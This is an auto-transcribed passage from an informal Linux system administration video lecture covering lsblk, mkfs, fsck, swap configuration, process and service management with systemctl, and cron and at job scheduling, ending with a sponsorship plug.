the breakdown of it so in the example that we saw with the AI there was the type label and uui and that would be done with the lsbl k-f so that it gives you the full I believe that’s what the f would stand for so it gives you the full display of all the block devices along with all the information like the type label and uuid and the output for that actually looks like this so it removes a few of the other pieces that we saw so the readon or the the swap location or the swap type for example those things we see that they’ve been removed from this particular location or from this particular output but now now we have in its place we have the UI uuid we have the label and the mountain point is also still there uh the fs type is still there as well and here’s a quick little screenshot just in case you want this so if you want to pause it to be able to write this down or if you want to screenshot this you have one two 3 seconds and we are moving on if you’re looking for specific data to be printed onto the screen you can actually use the dash o uh flag or argument or option to be able to list what you want this has to be all in caps lock and then you you need to know the actual name itself of the column that you want to print onto the screen so in this particular case it would print the name of it the size of it the fs type and the mountain Point location and it you can just customize your output in whatever way that you want if you do the dasd option it’ll display the information about the whole dis only excluding the partitions of the dis meaning that uh you have the dis right here so this is the disk and then these are the partitions of the disk so these will be removed if you use the DD option you will only see the diss themselves and so this is a quick little summary so lsblk provides the detail tree view of the devices with the F option it’ll include the file system information it is customizable so you can actually use uh the- o to be able to view whatever you want to actually view on the output and yeah that is the list block devices mkfs very similar to MK dur is a making of a file system so you can make file systems it’s used to format a partition with a specified file system type and you can use it with the mkfs so and very similar to what it looks like in Python structures you would use the dot to uh declare what type of file system you want to create so you would do pseudo mkfs do xt4 and then on this particular disk so you can see that uh this is the obviously the file system type that you want to create and this will be the the partition which is on the SDA dis on the first position and it’s being created as an xt4 file system uh the xfs file system is a high performance file system known for robustness da d da so you can do pseudo mefs uh xfs so pseudo mkfs do xfs and you can now create an xfs file system same thing with the fat 32 uh in this particular case you would actually need to say it’s a v fat type of a file system I love saying that the V fat type of a file system and then you do a-h capital F and then say that it’s a 32 extension of it so these are the older ones that are typically used for USB drives and things like that and they are widely uh supported meaning that you can use them on Windows as well as Mac OS and so on and so forth um but they’re typically limited to the amount of space that they can tolerate which is 2 terabytes as we discussed earlier in the training so uh this is specifically for USB drives for the most part or something that is maxed out at 2 tbytes um it is a little bit slower it’s a little bit older so that part of it you should already know about but if you want to create it instead of saying fat 32 on the dot afterwards you would say vat and then you would go- F32 and then the rest of it stays the same NTFS would be the new technology file system that is a Windows uh ingrained or intuitive to Windows and uh this is for advanced features like journaling support for large files formatting and partition with this can be useful for compatibility with Windows and you would say make FSS make fs. NTFS and then give the location that you wanted to do it so this is our example workflow so you want to First identify the partition so you would use your list block devices or Fisk list to list whatever block devices you got so for example lsblk would just be the you type it out you press enter and it gives you the list and then you choose the appropriate m mkfs m uh the make FS command based on the desired file system type so if you want to do xt4 you would say mkfs do xt4 at this particular partition and so again so keep this in mind right so what if you’ve create you’ve identified the partition that you want using the lsblk now you want to create a file system on the partition that you’ve uh found or you’ve design designated declared right from that that file system you’re going to create or from that partition excuse me from that partition you’re going to create the file system that’s going to be mounted onto it and after that’s done you can verify the file system type using the lsblk DF command and press enter and then you’ll verify what you got onto that file system so in summary the make FS the mkfs is used to format partitions with different file systems um you can uh use file system types like xt4 xfs fat 32 NTFS Etc um and then you just need to choose what you want based on the compatibility um there’s something called the dis utility and so just to compare it to uh something that would be on Mac OS for example there’s something called the Disk Utility tool that will do this for you with a gue type of an environment so you connect the USB drive and or an external drive whatever it is um and then you say that you want to reformat you go to the dis utility you select the USB drive that has just been connected to your device and then you go to format and then you choose the formatting option that you want and it would be xt4 xfs whatever is available for that specific drive and then you uh finalize it right so this is what this is doing uh it’s looking at whatever that connection is whatever that USB drive or external drive or disk is it’s going to look at that and then once you know exactly where it is what is mounted on as what its name is so on and so forth you then use pseudo Mech fs and then you reformat it right you format that drive to be one of these types of file systems and to completely be like very brutally honest and just declare like really really note you you know what I mean like disclose this for you uh this is going to wipe the file system and most in most environments in most cases it’s going to wipe everything that’s on that drive so when you format a USB drive it’s going to clean it out it’s going to delete everything that’s on there uh because it needs to reformat the thing so you need to make sure that if there’s anything on that dis that you want to be backed up you got to back it up first before you do this command because it is going to wipe the file system it’s going to wipe the current formatting of that USB drive or that disc and most likely you’re going to lose whatever is on there so just keep that in mind right if it’s not empty if it’s not a brand new USB or external drive that you’re trying to change or if it’s not a brand new disc that you’ve installed if it’s not one of those things and it’s already empty you need to back up whatever needs to be backed up before you run this because it’s going to wipe it fsck for file system check so this is what actually is ran um from that uh the fs tab file when we declared what we wanted it to run on boot and we were looking at the various partitions and discs that were going to be launched on on boot the very last option was do you want to pass or not and we were going to say yeah I do want you to pass or I don’t want you to pass which means you’re going to check and run FS check on it so it’s the file system consistency check that’s basically what it stands for and it detects and repairs any file system issues and you should pretty much use it so obviously if it’s on the the fs tab configuration file it’s going to give you the option of running it on boot so it’ll run the check of that whatever file system that’s been mounted as soon as you boot up your computer um but if you haven’t shut down the computer properly or if it crashed or something and you just want to make sure that uh nothing has been lost when you reboot it you will run FS check to just make sure that the file system is still all good uh to identify any kind of issues if there are any issues hopefully there aren’t any issues but sometimes there’s an improper shutdown you lose power or the system crashes for whatever reason so that’s all good if you manually reboot or shut down the system without properly unmounting your file system that would be another reason to run FS check on it to just make sure that it’s all good any kind of an error that happens so if there’s a boot failure for example and you start up your computer and for whatever reason it doesn’t boot that specific file system you run FS check to try to diagnose what just happened and why it didn’t Mount or why it didn’t uh boot it um same thing for mounting so if you can’t boot it or if you can’t mount it um then you run FS check to see what is going on with that particular uh partition and resolve any kind of underlying issues because you need you need to understand that you can connected right so it can be connected to the computer but it won’t be mounted and that is a very uh nuanced difference so you can have it be physically connected but it may not necessarily be mounted and so if it’s not mounted you need to find out why it’s not mounting then we have periodic maintenance so just preventative checks right so to just make sure that uh it’s all good and uh there’s nothing wrong with it you just run routine maintenance um if there’s any kind of an update or a health issue or any kind of a minor issue you can catch that before a major issue comes into play and before there’s a crash or before you lose any data and then there’s schedule check so many systems are actually configured to run this automatically at boot like we already talked about after a certain number of reboots or Mount operations um you can write scripts to do it for you every week or something or every month just to make sure your amount uh points and your file systems are all good so uh it’s better to do it regularly instead of waiting for some kind of a crash to happen or some kind of error to come up so that if there is something going on you can catch it in advance and then you can fix it so running it at boot is as simple as making sure that the pass option has been turned on with your FS tab configuration file uh manual invocation would be to just run pseudo FS check on whatever that partition is or whatever that dis is and it’s as simple as just running pseudo FS check it’s really this part is not is not that complicated to explain um you can also have unmounted partitions that you want to check uh before um running to avoid any kind of potential data corruption so you can unmount the partition first and then run FS check on it to just make sure everything is all good and that’s another strategy that you can run to run FS check um there’s interactive mode that can actually prompt you to fix anything um within the interactive mode and you can use the flags to automate the process um so for example Dy will be automatically answering yes to all of the prompts that come up so do you want to automatically repair something you just do Dy and then it’ll go ahead and uh run the entire autocorrect for you or the automatic repair for you uh without you constantly having to say yes yes yes so it can be opened in Interactive mode for the repair of any file system if it needs to be file repaired or any partition that needs to be repaired and then if you just attach that- y it’ll do everything automatically so as a summary you have any proper shutdown or file system error or any periodic maintenance that may be required that to run FS check on it and it just makes sure that the file system remains consistent uh if there’s any data loss you can be preventing it or catch it in advance if there is mainten maintenance that needs needs to be done um making sure that the system just runs smoothly all the time without uh risking the loss of any data it’s very very important um as an extra reminder just make sure that you back up the important Data before running FS check because sometimes through the uh through the repair process you may actually lose certain data because if there’s something with that file system that has been uh corrupted or if there’s malicious data or some kind of a malware or something that’s been installed on it uh you most likely are going to uh in the process of wiping that malware you’re going to lose other data that may be important to you so you want to make sure that you run backups uh or save the important files before you run FS check just in case it wipes certain things as an attempt to repair your file system which brings us to the configuration and management of the swap space so um we’ve kind have gone over this so we’ll just re-review this cuz this actually was a little bit of a concept for me to wrap my head around as well so it’s virtual memory so the swap is virtual memory on your hard drive that’s used when physical processing power is maxed out right so your RAM is technically part of the processing power of your computer so you’ll you know you’ll hear people like computer nerds you’ll hear computer nerds be like oh I got a 64 gab RAM on my computer there was literally somebody that actually commented on the channel that they were like yeah I remember my first computer had 24 megabytes of RAM and then now I have a 64 gigb of ram I’m like holy crap dude 24 megabytes like you know the system is old when you’re measuring the Ram with megabytes instead of gigabytes so you’ll have these nerds that really really compete over the size of their ram my Ram is bigger than yours kind of a thing and it’s mainly because it helps run things much much faster and usually in modern computers if they have 64 GB of RAM or 128 GB of RAM if they have that much RAM you’re most likely not going to worry about swap space but if it’s limited so if you have 4 GB of RAM or if you have 8 GB of RAM or something like that the swap space is very important because it’s going to serve as virtual memory to save uh life processes so that you don’t lose anything especially when you put the system into hibernation or it goes into sleep or something and you want to turn it back on and pick up where you left off all of that data is either inside of the ram the random access memory or it’s inside of the swap space so the swap is a buffer to prevent out of memory errors meaning that the system can’t run because the physical memory has been maxed out and so it’ll take whatever is being uh it’s kind of over the threshold of the physical RAM it’ll hold on to that um by offloading the inactive processes from the ram so if you have too many things open and you’re actively using something the ram processing power is going to be dedicated to what you’re actually using and everything else that’s in the background is going to go into your swap space if you want to create a swap partition you can create that swap partition using the Fisk command so you can create a partition uh simply by just opening up whatever it is that you’re trying to open up and then you would create a swipe uh swap type of a partition so uh a dis partitioning tool which is f disk you’re going to uh use it uh on the specific location so in this particular case it’s sdb as you can notice so it’s sdb which is going to be our external or secondary dis and it’s going to be where the swap partition is going to be created you can replace it with whatever identifier that you want to use and then you actually go through the process as you interact with Fisk to create the partition right so you would open up f disk on that location press n to create a new Partition press P to create a primary partition and the partition number for example would be two and then you accept all the default uh first sectors to accept the default last sector and then you have to change the partition type so this is the part right here where you change the partition type to swap you press t for swap I don’t know why it’s t maybe it’s temporary that’s what stands for maybe and then you press 82 which is the Linux swap number and then that’s it and you press enter and then after all of that is done you press W and press enter to write all of the changes to the disk and then exit f disk to make sure all the work that you did is going to be saved so that’s how you create it right so kind of review that cuz I’m not going to keep repeating myself I sometimes I keep forgetting that I’m doing a recording and then I am I beat something to death that’s like a bad phrase uh you know beat a dead horse or something whatever the phrase is I just keep repeating myself because I want to make sure that you get it but then I’m like oh you know what they could technically just rewind this and go replay it over and over again so my bad I’ve gotten comments from people that are like did you have to talk about that thing as long as you did and I’m like yeah well I just want to make sure that people get it so I try to say it in different ways so that it connects excuse me for trying to help you learn Jesus God I’m I’m having a conversation by myself in my room as I’m recording just just so you know okay moving on so now you need to format that partition as a swap space so now that you have that specific disc that you did everything with Fisk now you turn it into a swap Space by using the MK swap make swap command and you format it as a partition um you it’s very similar that we already have this understanding so we’re going to move on um then you turn it on right so you’ve you’ve used Fisk you’ve created that partition then you use me swap to turn it into a swap partition and then you use swap on to actually turn it on as the swap partition and very simple I’m I’m not going to keep repeating all of these things because the instructions are meant to be redundant um but here I’ll just leave this on in case you want to screenshot it 1 2 3 moving on and so verifying the swap space you just go show you use the D- show option with swap on to just make sure that it’s actually been created as a swap space and it’s actually turned on and it’s running as smoothly as it is so it’ll be the active swap spaces that are viewed when you run the swap on command with the show option so creating a swap file is similar to having a swap partition so creating a swap file to turn a swap file or to create a swap file it would be done with the F allocate and then you use the dash l so don’t confuse this with a one right so pseudo F allocate dasl and then 1 Gigabyte is going to be allocated to wherever the swap file path is right so you have a swap file instead of a swap partition um the F allocate allocates this uh space for that file the dash L 1G would be the limit right so you’re doing a 1 gigabyte uh limit for this particular file location and then you have the swap file which will be the path to whatever the swap file is and then you do chod 600 so you change the mode the permission of it uh to that swap file to set the file permission to read and write only for whoever the owner is and then that should allow it to actually read and write as necessary and then you would turn it into a swap so this part is pretty much exactly the same as what we did with the swap partition which in this particular case we’re just making swap uh the actual swap file path and then you would turn it on right so swap on for that swap file and then of course once it’s been turned on you just want to make sure that it is active and it’s running so you would do swap on– show so pseudo swap on– show and it’ll show you whether or not that specific swap file has been activated the last step with your swap partition or swap file would be to make sure that it actually loads every time you boot your computer right so you need to add it to your ety FS tab file as we’ve discussed uh so far so you need to configure the actual ET CFS tab file uh we can do it with our trusty Nano text editor by just opening up the ET CFS tab with Nano of course you would need to do it with a pseudo permission so you can actually write to it and save it um then you would uh add whatever the swap partition is uh in that particular FS tab according to the formatting that we’ve talked about so far so you would provide the name and then the location and then the type of the partition which would be Swap and then whether or not you want it to be dumped which is no you don’t want it to be dumped whether or not you want it to be passed um in the fs check when you reboot and you don’t want it to do that either because it’s going to be wiped every single time that the computer is rebooted anyways that’s the whole purpose of the swap partition it’s not going to store any memory or any kind of data on it because every time it gets rebooted it just gets deleted so that’s the whole purpose about this so you don’t need to dump it and you don’t need to check it with FS check when it gets started on but you do need to provide the name you need to provide the path and then you need to provide uh what type of partition it actually is which is going to be swap or what type of file system so this is the piece for the file system and so on and so forth so this is how it looks uh notice how all of these things are exactly the same with the exception of whether or not it’s a swap file or a swap partition and even this looks very similar right you’re just giving it the path to the partition or you’re giving it the path to the swap file that’s basically it and this is the explanation of what we just looked at right so you can screenshot this one 2 three so the first portion was the swap partition itself um it’s not going to be mounted onto anything because it is a swap partition it is the swap space and then s SW for the Swap and those are the options that you got and then so once you you have written everything into the fs tab file inside of Nano you’re going to save the changes doing crol o press enter and then controll X to exit out and then you can move on in summary creating and configuring swap space whether as a partition or a file is essential for maintaining system performance by following these steps you can ensure that your system has adequate swap space available and it’s probably a good idea to actually have this uh whether or not you have a massive amount of RAM installed on the computer um the Mac OS whether it gets uh you know 16 GB 32 GB whatever the the actual Ram is or Windows whether it has all of that massive amounts of ram it still has swap space so it’s probably a good idea if you’re going to be a Linux administrator and you’re going to use the type of interface that doesn’t have a GU or it doesn’t come preconfigured with with these types of things it’s probably a good idea for you to make sure that there is swap space that’s been configured and if it hasn’t been configured you go ahead and configure it the way that we just talked about and of course we’re going to review all of this stuff when we go into the Practical section and this is your little cheat sheet so if you want to create a swap partition you can create it using FS disk or f disk excuse me you can create f disk and then you have the creating of the partition then you format it to become a swap space and then you turn it on using swap on and then same thing F allocate L1 GB to the swap file pseudo chod the swap file and then make it a swap file and then turn it on as a swap so once you’ve created the swap space now you got to manage the swap space um the swap space usage and ensuring that the configuration persists across all of your reboots and restarts of the computer is very important for system administration these are the detailed steps that you got to do to check the usage so checking swap usage you would go swap on Das s excuse me swap on- S and it displays the summary of the swap space usage listing all of the active swap areas and this is the example output that you have over here so you would have the file name swap file and then you have the dev sdb2 which is the partition for the Swap and then these are the sizes that they have and then for the swap file 2,000 uh kilobytes has been used and it has a priority of minus two and then this has a priority of minus one and it hasn’t been used at all as you can see over here because it doesn’t need to you know for whatever the situation is this is 1 GB worth of space so it seems to be fine this is just a breakdown of the fields that we just looked at so the path to the swap file the type of file that it is or the type of partition that it is um the total size of it the used amount of it and a priority of the swap space so lower numbers mean that it’s a higher priority and the higher numbers mean that it’s a lower priority uh which is again I guess it makes sense right so number one would be a higher priority than number two um so that is the breakdown of these fields another way that you can check the usage would be using the free command so free- provides a human readable format of memory and swap usage and this is what the output would look like so you have the memory itself and then you have this swap space or swap partition swap file whatever whatever that allocation is when you’ve created your swap partitions or swap spaces um the total amount of memory and then the total amount of Swap and then the used amount of memory and the used amount of swap how much you have free whether it’s a shared portion or if it has any shared portions and then the buff cache as we talked about the buffer and the cache and then the available that’s going on with it so if you look at the the stuff that is sitting inside of the shared portion of this memory as well as the stuff that’s sitting inside of the buffer and the cash egg these are the things that we were talking about when you’re talking about unmounting to make sure that this 5 GB of data isn’t lost so you want to make sure that you properly unmount or you properly shut down whatever the system is or whatever the partition is so that you don’t lose this data because out of the 15 gigabyt losing 5 gabt of data would be catastrophic because it represents a large amount of data on this particular system so free shows you the free space the free memory as well as the free swap space that is available on your computer and these are the breakdowns of the fields so you have the total amount of memory you have the used amount of memory the free amount of memory the shared memory usage by the temp uh FS the shared memory that’s available to the temp file system you have the buff and the cache the buffering and the cach a the memory that’s used by the kernel buffers and Page cache and of course anything that’s available um after all of these things are considered right so after this is considered after the shared and the buffering and C cache is also considered after all of that is considered this is the final available amount of space that is available on that individual partition or disk and this is how we look at the permanent swap configuration so uh to make sure that it’s available after the system is rebooted you have to add it to the fs tab right so this file contains information about this partition so on and so forth um so where are we at I feel like I accidentally clicked something um so there we go so to be able to edit the fs tab file we’re going to use pseudo and Nano and then we’re going to go inside of it and just make sure that the swap partition is designed as it is so we’ve already talked about this this is just part of the permanent swap configurations as we’ve discussed and you should already know what all of these things stand for so I’m not going to explain this again uh you can do a one two three screenshot or pause it or take it down so on so forth and we’re going to move on so add the swap entry to it would be as a swap file same exact concept uh the breakdown is exactly the same so again I’m not going to say this this just redundancy so that you understand that these actions fall into different categories and so managing swap space or creating swap partitions both have a permanent feature and both of those features are inside of the fs tab configuration file that is inside of the Etsy FS tab location and then you save and exit because you’re inside of Nano so you just got to make sure that you save it and even when you try to exit without saving it’ll prompt you to whether or not you want to save it and you just press Y and press enter and I’ll save it and make sure that all of your changes have been saved to that document um activating it is exactly the same way as doing what we did before so pseudo swap on and a would be the activating all of the swap entries inside of the fs tab so you can do pseudo swap on and then give the path or the location or the the the identity of the swap space itself or you can just do- a to just make sure all of your swap configurations have been activated inside the fs Tab and then you just do das Das show to show you uh what the status of everything is and whether or not they’re actually active and correctly configured so in summary we’re going to monitor and configure swap space to make sure that the system can handle anything that’s memory intensive and remains stable under a heavy load which typically if it’s a high traffic environment if there are a lot of users that would be necessary so even if you have a massive amount of physical RAM you do want to have a good amount of swap space as well because you have a lot of data that’s being processed by a lot of different users and is your little cheat sheet so to check the swap spice using swapon you can do swap on- S that will list all the active swap areas and then you can do free- that’ll do a human readable summary of the memory and the swap usage and then if you want to make permanent edits you would do it inside of the fs tab configuration for reboots all the time so that it just loads every single time and then you can make sure that you have swap on- a so that it activates all of the swap entries that are inside of the fs tab file all right real quick let’s go into process and service management so you got to understand the difference between processes Damons and services okay a process is an instance of a program that’s running in memory uh each process has its own P ID its your own process ID and there’s a parent ID which is a PP ID so a parent process ID uh processes can be in a lot of various States or I guess three various States uh it could be running sleeping and zombie States so it’s a program it’s an instance of a program that’s running in memory and it has a p and a parent ID and it can run in various States including running sleeping and zombie States a Damon are background processes they’re running without an interactive user so the it’s basically Al what’s running behind the scenes in order for your machine to operate the way that it does um and it’s starts at boot and it continues to run while the uh the computer is on so that all of the operating system functions can actually run the way that they need to uh so for example a web server Damon like the HTTP D so the d stands for Damon um and anything that ends with with the D so you have the secure shell Damon or you have the cron Damon these are all considered the background processes that are attached to each of one of these individual processes so SSH process or the HTTP process so on and so forth okay and then you have a service uh service are the higher level concept meaning that they group one or more Damons together and that provides a specific functionality so the httpd service runs the Apachi HTTP server Damon right so the httpd service runs the Apachi HTTP okay so that’s the thing to understand so the service itself is a combination of a few Damons or at least one or more Damons that provide a specific functionality and they’re typically managed with system M D or CIS vinet as we talked about earlier these are our initialization processes and for the most part it’s probably going to be systemd on all of the modern computers in Linux cisv it is a little bit of a legacy um and it just depends on the distribution of Linux that you have and the version of Linux that you have so uh you have processes you have Damons and then you have Services okay these would be the commands that would manage the processes so if you want to view the list of processes you would just type PS and press enter that’s just by itself will actually show you the snapshot of all of the current processes if you do psox so PSA it shows all the processes that are running on the system with their details like their pids the user that is running it the CPU usage and the memory usage that it’s processing or that is taking up the the power that is taking up and then you have ps- EF which will display all the processes with the additional details like the parents process ID and the full command line the full and these are this is like where you a lot of these things are actually very much used inside of uh security analysis and incident response and the uh pen testing exercises that we run and the command line that is executed to launch that process can either be done by the system or it can be done by the parent ID the parent process that’s running that individual process or it can be done by a user so when a user clicks on something it actually processes a command in the background and that command has a command line entry so even if you double click on something to open it there’s actually a command line entry that’s running in the background and that is what’s launching that process so everything whether or not you use the command line and everything has a full command line entry associated with it and typically it would for a lot of people that can’t read this stuff it’s mostly jargon but uh in a lot of instances it’s the uh individual command that’s associated with it and the path of the binary that is attached to that process which is launching and actually running so remember all of these things have binaries or system binaries that are assoc associated with them and each of one of those system binaries is housed inside of the bin or sbin uh directories inside of our file system okay so keep all of that in mind so uh you don’t necessarily need to know much about this stuff uh you need to know the details that are presented and then as we go through the Practical portions of this training series we’ll start looking at a lot of these things in Greater detail and we’ll run a lot of the common options that come with PS and looking at the various processes so you can see see what all of that looks like when it’s displayed onto the terminal so that you can have a better understanding and just really kind of get that into your system into your uh your personal system as the person that’s watching this not your computer system okay moving on um so we have realtime process monitoring that happens with top and htop and top is typically what’s available on all Linux systems it’s actually also available on Mac Mac OS because Mac OS has a Unix like uh type of an operating system that’s running in the background um it’s a dynamic display of everything that’s going on so top actually when you press it uh or when you type it in and you press enter it shows you uh everything that’s currently running and it actually changes uh their uh their line item uh positioning right so the order of everything that’s being presented onto the screen changes in real time because something may be coming to the Forefront something may be using more processing power or CPU or memory and you can get a good I idea of what specific process is using up how much of your memory in real time and this is one of the things that you would look at to see uh if there is something that’s running that you don’t recognize and if you need to uh kill it right so uh the apart from the list of processes that are running which we saw with PS top shows you the the real time Dynamic view by usage right so it it’ll typically show you what’s currently running that list changes in real time and it’ll show it’ll show you what CPU and memory it’s using um you can press Q to quit or k to kill a process and R to renis which means to adjust the priority of the various processes htop if it’s installed it’s essentially top but it has a userfriendly interface because top is literally command line and it’s just lines of entries uh on a black screen and if you don’t know what you’re looking at it can be kind of overwhelming so htop is the userfriendly interface it’s like uh it’s a visual uh visually pleasing version of top that you can run and it’ll still show you real-time monitoring of all the processes that are running there’s colorcoded information and a better navigation interface so that you can navigate better and uh according to the color coding that’s done you can prioritize things better so top again is just a black screen with a bunch of white lines of data on on top of it htop is more user friendly it has color coding available so on and so forth once you’ve established a process that needs to be killed for example if you notice something that might be Shady or that might be taking up too much CPU or memory usage you can kill it with either kill or pkill for process kill and kill is a very simple uh command so you say kill and then you provide the P ID that you want it to kill and it sends a signal to the process ID and it just kills it um kill Das 9 PID sends the signal kill to forcefully terminate the process if it’s having uh if it’s taking too long to uh terminate or uh for whatever reason it might be slowing down something uh so it’s a forceful termination uh very similar to what happens in the task manager inside of Windows where you want to close something but it won’t close so you open up the task manager task manager and then you force quit that individual process that’s running and it just no matter what’s going on it’ll just crash and kill the process and then pill allows you to kill it by its name so kill requires the process ID pill can kill it by the process name and then at the same time you can also terminate all instances of a specified process by doing a kill all command and it requires pseo pseudo permission and then you do pseudo kill all and give it the process name so for example in this case let’s say you have you know 10 chrome windows open that’s kind of what my computer is like all the time I have uh different Google Google accounts Gmail accounts that are dedicated to different parts of my life and so for each one of those Google accounts there’s a chrome window that’s open and sometimes it can be overwhelming and sometimes you kind of you kind of you might want to close Chrome and general all together and then just start from scratch and open up a brand new Chrome window so when you do that you for me in Mac OS I can just right click on the Chrome logo at the bottom of my screen and then quit and then it’ll close all all of those instances of chrome that I have but when you’re inside of the command line and you don’t get the option of right clicking then you would just see okay there’s you know there’s 10 instances of this particular process and I want to close it because I want to free up CPU usage or I don’t know what it is I don’t recognize it it seems like it might be spamware or something like that so what I want to do is I just want to kill all instances of this process so then you’ll do pseudo kill all and then you would give it the process name and it’ll kill all of those processes and free up whatever memory or CPU usage that those things are currently using and as we manage processes we also need to learn how to manage services so managing Services happens with system CTL and we’ve actually already gone through this a little bit earlier um and system CTL is one of the big things that comes with systemd um which is the more uh modern version of the initial the init process for uh Linux and it’s a primary command for managing these services in that environment so uh starting or stopping a service is pseudo system CTL start the service or system CTL stop the service very simple enabling or disabling it is very much the same so pseudo system CTL enable or disable the service if you want to check the status of it it will be system CTL status of the service so it’ll show you whether or not it’s active and any logs that would be associated with the recent activity for it and then restarting or re reloading it would be say same restart the service or reload the service so it’s very intuitive I love the Syntax for this particular command because if you want to start something you literally just type start if you want to stop it you just type stop so it’s very very intuitive actually this is probably one of my favorite commands when it comes down to everything that we’re running cuz the syntax is just real language it’s real words that you’re using so this is kind of an easy one to remember and to deal with but uh system CTL manages Services right PS manages processes system CTL manages services so keep these things in mind these are the types of things that you need to kind of internalize for yourself as you move forward so when you want to manage a service you use system CTL now the service command is used in systems that have CIS vinet so CIS vinet is the older version of system d right so we look at this right here system D is in the modern distributions of Linux CIS vinet is in the older versions of Linux or the older distribution and it’s fairly similar to what you went through with system CTL except the syntax is a little bit different so you do pseudo service the N the name of the service and start or stop or get the status or restart it so these are the basic commands that would come with CIS vinet now what I’m going to be doing uh in the Practical portion of our exercises are not going to be using the CIS vinet commands we’re going to be using system CTL commands because we’re installing a current version of Linux or the most upto-date version of Linux because I don’t want any security vulnerabilities to be uh loaded on my computer as I’m going through all the exercises so I’m going to use the most recent version that I’m going to get from the Linux website so we’re going to end up using systemctl but these are just the series of the commands that you would get for CIS vinet and then there’s a series of commands that are also available inside of the Google document that I’ve created for the notes for this course and then if all else fails you can go to something like gemini or chat GPT and you say I’m running a system that has CIS Vin it as the service uh Management Service and what you’re going to go through is you know I need to do X Y and Z within this computer what are the commands that you would need I would need to run and then it would tell you what you got to do but the the main things to remember are that CIS vinet is for older versions or older distributions that run uh services and you would need to manage them as such and then systemd comes with the modern versions and the modern distributions of Linux and then we have job scheduling and KRON jobs are more so uh repeated tasks that you need to schedule and then the at command is used for a singular command that’s running uh for that one time so if you want to do anything that’s recurring you would do it with the Kon or the KRON jobs which uh essentially just handles all of the recurring scheduled tasks for you so if you want to edit the user’s Kon tab so KRON jobs are defined in the Chron tab files and then when you open up somebody’s Chron tab file you’ll see something that is in this kind of a format and that it has these asterisks that represent the minute hour day of the month month and day of the week so this would be the minute hour uh month itself or yeah minute hour day of the month sorry so minute hour day of the month the month and then the day of the week so in this particular case right what we have over here we have not uh it doesn’t need to run every minute but it needs to run every 5 hours or at 500 a.m. so my bad so this is the uh hour itself which is running the uh fifth hour of the day so it needs to run at 5:00 on that day and then it’s going to run every Monday because Monday is the first day of the week so 5:00 a.m. every single day uh doesn’t matter day of the month is empty doesn’t matter the month that part’s empty where you’re going to do it every Monday so it’s being run Weekly right so this is an example of this now there are a lot of great editors that are available online that if you want to modify something if you want a job to run at a specific time or day or whatever you can go to that editor and you say that this is the path to the job that I want to run and I want to run it at this time of this day or this month or whatever it is and it’ll just create this version this format of the command for you so it looks like this but I mean this isn’t really complicated to understand so I feel like you should be able to wrap your head around this so the first day of the week is represented by uh one and in this particular case it’s not Sunday Monday the first day of the week would be Monday and then the first hour would be 1:00 a.m. and then 2: a.m. 3:00 a.m. so 5 would represent 5 a.m. and the uh day of the month itself would be the first day of the month or the 2nd or the third and I think it’ll go up to 28 because we do have limitations for February so it’ll go all the way up to 28 and then you have the month itself so it would be the first month of the year which would be January the second month so on and so forth so you can look at all of that by going to Chron tab edit Chron tab e to look at whatever user that you’re logged in um to be able to modify those KRON jobs those specific schedule tasks if you want to look at all of these schedule tasks you can instead of opening the document itself you can just do KRON tab DL and you can list all of the KRON jobs the schedule tasks that are available for the user that you’re logged in on so this is recurring jobs with KRON now if you have a one-time job you can schedule that with at so for example you would say Echo the command which is it’s technically just running uh Echo and it’s going to print command onto the screen do a pipe and then do it at the time right so you the time could be a specific hour or relative time for example it could be at now plus 5 minutes or at now plus 5 hours an example of this could be Echo the path to this script right here it could be this specific thing I want you to Echo this meaning just print it print this path and then you pipe it so you take the output of this result that’s what piping does uh you take this result the output of this gets piped into this particular command meaning that at 10:00 a.m. it’s going to Echo this piece right here and that’s what at does so it will uh it’ll run something one time for you if you needed to run daily or more than once you would do it with Chron jobs if you’re just trying to run it once you can run it with the at command you can look at the scheduled jobs for at with atq and you can remove them with ATR r m and then the job number itself so you would do atq and it will bring you all of the jobs that have been scheduled with at and then you will get the job number with each job that’s been scheduled and if you need to remove anyone you just do atrm at remove and then do the job number and then just like that you can remove the scheduled task with at this training series is sponsored by hackaholic Anonymous to get the supporting materials for this series like the 900 page slideshow the 200 Page page notes document and all of the pre-made shell scripts consider joining the agent tier of hackolo anonymous you’ll also get monthly python automations exclusive content and direct access to me via Discord join hack alic Anonymous today

    By Amjad Izhar
    Contact: amjad.izhar@gmail.com
    https://amjadizhar.blog